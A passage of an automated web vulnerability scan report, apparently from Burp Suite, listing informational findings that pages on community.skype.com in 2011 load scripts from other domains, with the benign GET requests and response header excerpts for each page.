   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.198. http://community.skype.com/t5/Skype-for-Business/ct-p/Business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-for-Business/ct-p/Business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-for-Business/ct-p/Business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:19 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 124965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.199. http://community.skype.com/t5/Skype-fĂĽr-Smartphones/bd-p/de_mobile_smartphones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-f..r-Smartphones/bd-p/de_mobile_smartphones

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-f..r-Smartphones/bd-p/de_mobile_smartphones HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:02 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 187198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.200. http://community.skype.com/t5/Skype-on-your-TV/Need-to-know/m-p/134140  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-on-your-TV/Need-to-know/m-p/134140

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-on-your-TV/Need-to-know/m-p/134140 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.201. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.202. http://community.skype.com/t5/Skype-на-компŃ?Ń?Ń?еŃ?е/ct-p/ru_community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-....-..................../ct-p/ru_community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-....-..................../ct-p/ru_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 141434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.203. http://community.skype.com/t5/Skype-на-мобилŃ?Đ˝Ń?Ń?-Ń?Ń?Ń?Ń?ойŃ?Ń?ваŃ?/ct-p/ru_mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-....-..................-....................../ct-p/ru_mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-....-..................-....................../ct-p/ru_mobile HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 121080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.204. http://community.skype.com/t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 126098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.205. http://community.skype.com/t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.206. http://community.skype.com/t5/Subscriptions/bd-p/Subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Subscriptions/bd-p/Subscriptions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Subscriptions/bd-p/Subscriptions HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.207. http://community.skype.com/t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 110706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.208. http://community.skype.com/t5/Support-et-information/bd-p/fr_community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Support-et-information/bd-p/fr_community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Support-et-information/bd-p/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:07 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 202419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.209. http://community.skype.com/t5/Supporto-Skype/bd-p/it_support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Supporto-Skype/bd-p/it_support

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Supporto-Skype/bd-p/it_support HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 186903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.210. http://community.skype.com/t5/Symbian/bd-p/Symbian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Symbian/bd-p/Symbian

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Symbian/bd-p/Symbian HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 185063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.211. http://community.skype.com/t5/Symbian/voice-call-nokia-c6/m-p/133740  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Symbian/voice-call-nokia-c6/m-p/133740

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Symbian/voice-call-nokia-c6/m-p/133740 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.212. http://community.skype.com/t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:15 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 105563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.213. http://community.skype.com/t5/Toolbars/bd-p/Toolbars  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Toolbars/bd-p/Toolbars

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Toolbars/bd-p/Toolbars HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 149478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.214. http://community.skype.com/t5/TĂłpicos-Gerais/bd-p/pt_general  previous  next

Summary

Severity:   Information
